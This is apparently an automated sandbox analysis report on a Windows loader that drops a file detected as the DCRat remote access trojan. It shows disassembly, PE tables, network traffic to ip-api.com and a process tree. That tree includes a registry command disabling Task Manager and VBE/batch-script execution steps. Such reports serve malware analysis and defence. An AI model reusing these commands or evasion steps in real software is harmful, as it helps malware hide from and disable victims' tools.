            ret
            jmp 00007F903D06A87Eh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F903D05D017h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007F903D06D41Dh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F903D05CFAEh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F903D06CB32h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F903D06A224h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F903D06CB15h
            int3
            jmp 00007F903D06EB63h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x46968 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xaa000 | 0x2268 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x63000 | 0x46968 | 0x46a00 | 689074b903b57cab01c40570dcd31615 | False | 0.1629563053097345 | data | 5.534485528882311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0xaa000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            PNG | 0x63524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
            PNG | 0x6406c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
            RT_ICON | 0x65618 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m | | | 0.12666065035358168
            RT_DIALOG | 0xa7640 | 0x286 | data | English | United States | 0.5092879256965944
            RT_DIALOG | 0xa78c8 | 0x13a | data | English | United States | 0.60828025477707
            RT_DIALOG | 0xa7a04 | 0xec | data | English | United States | 0.6991525423728814
            RT_DIALOG | 0xa7af0 | 0x12e | data | English | United States | 0.5927152317880795
            RT_DIALOG | 0xa7c20 | 0x338 | data | English | United States | 0.45145631067961167
            RT_DIALOG | 0xa7f58 | 0x252 | data | English | United States | 0.5757575757575758
            RT_STRING | 0xa81ac | 0x1e2 | data | English | United States | 0.3900414937759336
            RT_STRING | 0xa8390 | 0x1cc | data | English | United States | 0.4282608695652174
            RT_STRING | 0xa855c | 0x1b8 | data | English | United States | 0.45681818181818185
            RT_STRING | 0xa8714 | 0x146 | data | English | United States | 0.5153374233128835
            RT_STRING | 0xa885c | 0x446 | data | English | United States | 0.340036563071298
            RT_STRING | 0xa8ca4 | 0x166 | data | English | United States | 0.49162011173184356
            RT_STRING | 0xa8e0c | 0x152 | data | English | United States | 0.5059171597633136
            RT_STRING | 0xa8f60 | 0x10a | data | English | United States | 0.49624060150375937
            RT_STRING | 0xa906c | 0xbc | data | English | United States | 0.6329787234042553
            RT_STRING | 0xa9128 | 0xd6 | data | English | United States | 0.5747663551401869
            RT_GROUP_ICON | 0xa9200 | 0x14 | data | | | 1.1
            RT_MANIFEST | 0xa9214 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
            DLL | Import
            KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
            Language of compilation system | Country where language is spoken
            English | United States
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Oct 26, 2024 16:17:11.799597979 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
            Oct 26, 2024 16:17:11.805083990 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
            Oct 26, 2024 16:17:11.805145025 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
            Oct 26, 2024 16:17:11.806296110 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
            Oct 26, 2024 16:17:11.811549902 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
            Oct 26, 2024 16:17:12.394113064 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
            Oct 26, 2024 16:17:12.409466982 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Oct 26, 2024 16:17:11.783951044 CEST | 49280 | 53 | 192.168.2.4 | 1.1.1.1
            Oct 26, 2024 16:17:11.792649031 CEST | 53 | 49280 | 1.1.1.1 | 192.168.2.4
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Oct 26, 2024 16:17:11.783951044 CEST | 192.168.2.4 | 1.1.1.1 | 0x7d80 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Oct 26, 2024 16:17:11.792649031 CEST | 1.1.1.1 | 192.168.2.4 | 0x7d80 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
            Oct 26, 2024 16:17:20.114623070 CEST | 1.1.1.1 | 192.168.2.4 | 0x847c | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
            Oct 26, 2024 16:17:20.114623070 CEST | 1.1.1.1 | 192.168.2.4 | 0x847c | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
            • ip-api.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7008 | C:\blockcomwinsavescrt\containercomponentSaves.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 26, 2024 16:17:11.806296110 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
            Host: ip-api.com
            Connection: Keep-Alive
            Oct 26, 2024 16:17:12.394113064 CEST | 174 | IN | HTTP/1.1 200 OK
            Date: Sat, 26 Oct 2024 14:17:12 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 5
            Access-Control-Allow-Origin: *
            X-Ttl: 60
            X-Rl: 44
            Data Raw: 74 72 75 65 0a
            Data Ascii: true


            Target ID:0
            Start time:10:16:58
            Start date:26/10/2024
            Path:C:\Users\user\Desktop\loader.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\loader.exe"
            Imagebase:0x100000
            File size:2'040'097 bytes
            MD5 hash:F462FD11CEDA48487DB07C5B70410DAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:10:16:59
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe"
            Imagebase:0x2c0000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\blockcomwinsavescrt\containercomponentSaves.exe
            Wow64 process (32bit):false
            Commandline:"C:\blockcomwinsavescrt\containercomponentSaves.exe"
            Imagebase:0xc10000
            File size:1'490'944 bytes
            MD5 hash:59E330F176AE037DCC65EFC5F7D7859A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 84%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:5
            Start time:10:17:11
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Imagebase:0xe20000
            File size:59'392 bytes
            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true


              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.3%
              Total number of Nodes:1501
              Total number of Limit Nodes:25
23142 10b806 CharUpperW 23133->23142 23135 10b692 23143 10b832 CharUpperW 23135->23143 23137 10b6a1 23138 10b6a5 23137->23138 23139 10b71c GetCurrentDirectoryW 23137->23139 23144 10b806 CharUpperW 23138->23144 23139->23141 23141->23128 23142->23135 23143->23137 23144->23141 24783 11a430 73 API calls 23190 12b731 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24841 11be49 103 API calls 4 library calls 24784 101025 29 API calls pre_c_initialization 23198 109f2f 23199 109f44 23198->23199 23200 109f3d 23198->23200 23201 109f4a GetStdHandle 23199->23201 23205 109f55 23199->23205 23201->23205 23202 109fa9 WriteFile 23202->23205 23203 109f7a 23204 109f7c WriteFile 23203->23204 23203->23205 23204->23203 23204->23205 23205->23200 23205->23202 23205->23203 23205->23204 23207 10a031 23205->23207 23209 106e18 60 API calls 23205->23209 23210 107061 75 API calls 23207->23210 23209->23205 23210->23200 24846 119b50 GdipDisposeImage GdipFree __except_handler4 24786 128050 8 API calls ___vcrt_uninitialize 23932 109b59 23935 109bd7 23932->23935 23936 109b63 23932->23936 23933 109bad SetFilePointer 23934 109bcd GetLastError 23933->23934 23933->23935 23934->23935 23936->23933 23938 11dc5d 23939 11dc2e 23938->23939 23939->23938 23940 11df59 ___delayLoadHelper2@8 19 API calls 23939->23940 23940->23939 24848 11be49 98 API calls 3 library calls 24787 11ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24788 118c40 GetClientRect 24789 123040 5 API calls 2 library calls 24790 130040 IsProcessorFeaturePresent 24849 11d34e DialogBoxParamW 23952 11d573 23953 11d580 23952->23953 23954 10ddd1 53 API calls 23953->23954 23955 11d594 23954->23955 23956 10400a _swprintf 51 API calls 23955->23956 23957 11d5a6 SetDlgItemTextW 23956->23957 23960 11ac74 PeekMessageW 23957->23960 23961 11acc8 23960->23961 23962 11ac8f GetMessageW 23960->23962 23963 11aca5 IsDialogMessageW 23962->23963 23964 11acb4 TranslateMessage 
DispatchMessageW 23962->23964 23963->23961 23963->23964 23964->23961 24794 101075 82 API calls pre_c_initialization 24795 115c77 121 API calls __vsnwprintf_l 24797 11fc60 51 API calls 2 library calls 24799 123460 RtlUnwind 24800 129c60 71 API calls _free 22854 11d891 19 API calls ___delayLoadHelper2@8 24803 117090 114 API calls 24804 11cc90 70 API calls 24851 11a990 97 API calls 24852 119b90 GdipCloneImage GdipAlloc 24853 129b90 21 API calls 2 library calls 24854 122397 48 API calls 22857 11d997 22858 11d89b 22857->22858 22860 11df59 22858->22860 22888 11dc67 22860->22888 22862 11df73 22863 11dfd0 22862->22863 22864 11dff4 22862->22864 22865 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22863->22865 22868 11e06c LoadLibraryExA 22864->22868 22870 11e0df 22864->22870 22871 11e0cd 22864->22871 22883 11e19b 22864->22883 22866 11dfdb RaiseException 22865->22866 22867 11e1c9 22866->22867 22907 11ec4a 22867->22907 22868->22871 22872 11e07f GetLastError 22868->22872 22874 11e13d GetProcAddress 22870->22874 22870->22883 22871->22870 22875 11e0d8 FreeLibrary 22871->22875 22876 11e092 22872->22876 22877 11e0a8 22872->22877 22873 11e1d8 22873->22858 22879 11e14d GetLastError 22874->22879 22874->22883 22875->22870 22876->22871 22876->22877 22878 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22877->22878 22880 11e0b3 RaiseException 22878->22880 22881 11e160 22879->22881 22880->22867 22881->22883 22884 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22881->22884 22899 11ded7 22883->22899 22885 11e181 RaiseException 22884->22885 22886 11dc67 ___delayLoadHelper2@8 11 API calls 22885->22886 22887 11e198 22886->22887 22887->22883 22889 11dc73 22888->22889 22890 11dc99 22888->22890 22914 11dd15 22889->22914 22890->22862 22893 11dc94 22924 11dc9a 22893->22924 22896 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22897 11df55 22896->22897 22897->22862 22898 11df24 22898->22896 22900 11dee9 22899->22900 22901 11df0b 22899->22901 22902 11dd15 
DloadLock 8 API calls 22900->22902 22901->22867 22903 11deee 22902->22903 22904 11df06 22903->22904 22905 11de67 DloadProtectSection 3 API calls 22903->22905 22933 11df0f 8 API calls 2 library calls 22904->22933 22905->22904 22908 11ec53 22907->22908 22909 11ec55 IsProcessorFeaturePresent 22907->22909 22908->22873 22911 11f267 22909->22911 22934 11f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22911->22934 22913 11f34a 22913->22873 22915 11dc9a DloadUnlock 3 API calls 22914->22915 22916 11dd2a 22915->22916 22917 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22916->22917 22918 11dc78 22917->22918 22918->22893 22919 11de67 22918->22919 22920 11de7c DloadObtainSection 22919->22920 22921 11de82 22920->22921 22922 11deb7 VirtualProtect 22920->22922 22932 11dd72 VirtualQuery GetSystemInfo 22920->22932 22921->22893 22922->22921 22925 11dca7 22924->22925 22926 11dcab 22924->22926 22925->22898 22927 11dcb3 GetModuleHandleW 22926->22927 22928 11dcaf 22926->22928 22929 11dcc9 GetProcAddress 22927->22929 22931 11dcc5 22927->22931 22928->22898 22930 11dcd9 GetProcAddress 22929->22930 22929->22931 22930->22931 22931->22898 22932->22922 22933->22901 22934->22913 24807 10ea98 FreeLibrary 24808 11a89d 78 API calls 24856 125780 QueryPerformanceFrequency QueryPerformanceCounter 22943 101385 82 API calls 3 library calls 24810 12ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24811 1016b0 84 API calls 23145 1290b0 23153 12a56f 23145->23153 23149 1290cc 23150 1290d9 23149->23150 23161 1290e0 11 API calls 23149->23161 23152 1290c4 23162 12a458 23153->23162 23156 12a5ae TlsAlloc 23157 12a59f 23156->23157 23158 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23157->23158 23159 1290ba 23158->23159 23159->23152 23160 129029 20 API calls 2 library calls 23159->23160 23160->23149 23161->23152 23163 12a488 23162->23163 23166 12a484 23162->23166 23163->23156 23163->23157 
23164 12a4a8 23164->23163 23167 12a4b4 GetProcAddress 23164->23167 23166->23163 23166->23164 23169 12a4f4 23166->23169 23168 12a4c4 __crt_fast_encode_pointer 23167->23168 23168->23163 23170 12a515 LoadLibraryExW 23169->23170 23171 12a50a 23169->23171 23172 12a532 GetLastError 23170->23172 23173 12a54a 23170->23173 23171->23166 23172->23173 23174 12a53d LoadLibraryExW 23172->23174 23173->23171 23175 12a561 FreeLibrary 23173->23175 23174->23173 23175->23171 23176 12a3b0 23177 12a3bb 23176->23177 23179 12a3e4 23177->23179 23180 12a3e0 23177->23180 23182 12a6ca 23177->23182 23189 12a410 DeleteCriticalSection 23179->23189 23183 12a458 pre_c_initialization 5 API calls 23182->23183 23184 12a6f1 23183->23184 23185 12a70f InitializeCriticalSectionAndSpinCount 23184->23185 23188 12a6fa 23184->23188 23185->23188 23186 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23187 12a726 23186->23187 23187->23177 23188->23186 23189->23180 24812 121eb0 6 API calls 3 library calls 24858 1279b7 55 API calls _free 24814 1276bd 52 API calls 3 library calls 24816 1096a0 79 API calls 24861 12e9a0 51 API calls 24819 11e4a2 38 API calls 2 library calls 24820 11acd0 100 API calls 24863 1119d0 26 API calls std::bad_exception::bad_exception 23213 11ead2 23214 11eade ___scrt_is_nonwritable_in_current_image 23213->23214 23239 11e5c7 23214->23239 23216 11eae5 23218 11eb0e 23216->23218 23319 11ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23216->23319 23226 11eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23218->23226 23250 12824d 23218->23250 23222 11eb2d ___scrt_is_nonwritable_in_current_image 23223 11ebad 23258 11f020 23223->23258 23226->23223 23320 127243 38 API calls 2 library calls 23226->23320 23234 11ebd9 23236 11ebe2 23234->23236 23321 12764a 28 API calls _abort 23234->23321 23322 11e73e 13 API calls 2 library calls 23236->23322 23240 11e5d0 23239->23240 23323 11ed5b 
IsProcessorFeaturePresent 23240->23323 23242 11e5dc 23324 122016 23242->23324 23244 11e5e1 23249 11e5e5 23244->23249 23333 1280d7 23244->23333 23247 11e5fc 23247->23216 23249->23216 23253 128264 23250->23253 23251 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23252 11eb27 23251->23252 23252->23222 23254 1281f1 23252->23254 23253->23251 23255 128220 23254->23255 23256 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23255->23256 23257 128249 23256->23257 23257->23226 23425 11f350 23258->23425 23261 11ebb3 23262 12819e 23261->23262 23427 12b290 23262->23427 23264 11ebbc 23267 11d5d4 23264->23267 23266 1281a7 23266->23264 23431 12b59a 38 API calls 23266->23431 23552 1100cf 23267->23552 23271 11d5f3 23601 11a335 23271->23601 23273 11d5fc 23605 1113b3 GetCPInfo 23273->23605 23275 11d606 ___scrt_fastfail 23276 11d619 GetCommandLineW 23275->23276 23277 11d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23276->23277 23278 11d628 23276->23278 23279 10400a _swprintf 51 API calls 23277->23279 23638 11bc84 81 API calls 23278->23638 23281 11d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23279->23281 23608 11aded LoadBitmapW 23281->23608 23282 11d62e 23283 11d6a0 23282->23283 23284 11d636 OpenFileMappingW 23282->23284 23640 11d287 SetEnvironmentVariableW SetEnvironmentVariableW 23283->23640 23286 11d696 CloseHandle 23284->23286 23287 11d64f MapViewOfFile 23284->23287 23286->23277 23291 11d660 __vsnwprintf_l 23287->23291 23292 11d68d UnmapViewOfFile 23287->23292 23639 11d287 SetEnvironmentVariableW SetEnvironmentVariableW 23291->23639 23292->23286 23297 118835 8 API calls 23299 11d76a DialogBoxParamW 23297->23299 23298 11d67c 23298->23292 23300 11d7a4 23299->23300 23301 11d7b6 Sleep 23300->23301 23302 11d7bd 23300->23302 23301->23302 23303 11d7cb 23302->23303 23641 11a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23302->23641 23305 11d7ea DeleteObject 23303->23305 23306 11d7ff DeleteObject 
23305->23306 23307 11d806 23305->23307 23306->23307 23308 11d837 23307->23308 23309 11d849 23307->23309 23642 11d2e6 6 API calls 23308->23642 23635 11a39d 23309->23635 23312 11d83d CloseHandle 23312->23309 23313 11d883 23314 12757e GetModuleHandleW 23313->23314 23315 11ebcf 23314->23315 23315->23234 23316 1276a7 23315->23316 23850 127424 23316->23850 23319->23216 23320->23223 23321->23236 23322->23222 23323->23242 23325 12201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23324->23325 23337 12310e 23325->23337 23328 122029 23328->23244 23330 122031 23331 12203c 23330->23331 23351 12314a DeleteCriticalSection 23330->23351 23331->23244 23379 12b73a 23333->23379 23336 12203f 8 API calls 3 library calls 23336->23249 23340 123117 23337->23340 23339 123140 23357 12314a DeleteCriticalSection 23339->23357 23340->23339 23341 122025 23340->23341 23352 123385 23340->23352 23341->23328 23343 12215c 23341->23343 23372 12329a 23343->23372 23345 122166 23346 122171 23345->23346 23377 123348 6 API calls try_get_function 23345->23377 23346->23330 23348 12217f 23349 12218c 23348->23349 23378 12218f 6 API calls ___vcrt_FlsFree 23348->23378 23349->23330 23351->23328 23358 123179 23352->23358 23355 1233bc InitializeCriticalSectionAndSpinCount 23356 1233a8 23355->23356 23356->23340 23357->23341 23359 1231ad 23358->23359 23360 1231a9 23358->23360 23359->23355 23359->23356 23360->23359 23364 1231cd 23360->23364 23365 123219 23360->23365 23362 1231d9 GetProcAddress 23363 1231e9 __crt_fast_encode_pointer 23362->23363 23363->23359 23364->23359 23364->23362 23366 123241 LoadLibraryExW 23365->23366 23367 123236 23365->23367 23368 123275 23366->23368 23369 12325d GetLastError 23366->23369 23367->23360 23368->23367 23371 12328c FreeLibrary 23368->23371 23369->23368 23370 123268 LoadLibraryExW 23369->23370 23370->23368 23371->23367 23373 123179 try_get_function 5 API calls 23372->23373 23374 1232b4 23373->23374 23375 1232cc TlsAlloc 23374->23375 23376 1232bd 
23374->23376 23376->23345 23377->23348 23378->23346 23382 12b757 23379->23382 23383 12b753 23379->23383 23380 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23381 11e5ee 23380->23381 23381->23247 23381->23336 23382->23383 23385 129e60 23382->23385 23383->23380 23386 129e6c ___scrt_is_nonwritable_in_current_image 23385->23386 23397 12a3f1 EnterCriticalSection 23386->23397 23388 129e73 23398 12bc39 23388->23398 23390 129e82 23391 129e91 23390->23391 23411 129ce9 29 API calls 23390->23411 23413 129ead LeaveCriticalSection _abort 23391->23413 23394 129e8c 23412 129d9f GetStdHandle GetFileType 23394->23412 23395 129ea2 ___scrt_is_nonwritable_in_current_image 23395->23382 23397->23388 23399 12bc45 ___scrt_is_nonwritable_in_current_image 23398->23399 23400 12bc52 23399->23400 23401 12bc69 23399->23401 23422 12895a 20 API calls __dosmaperr 23400->23422 23414 12a3f1 EnterCriticalSection 23401->23414 23404 12bc57 23423 128839 26 API calls pre_c_initialization 23404->23423 23406 12bca1 23424 12bcc8 LeaveCriticalSection _abort 23406->23424 23407 12bc61 ___scrt_is_nonwritable_in_current_image 23407->23390 23410 12bc75 23410->23406 23415 12bb8a 23410->23415 23411->23394 23412->23391 23413->23395 23414->23410 23416 1285a9 pre_c_initialization 20 API calls 23415->23416 23419 12bb9c 23416->23419 23417 12bba9 23418 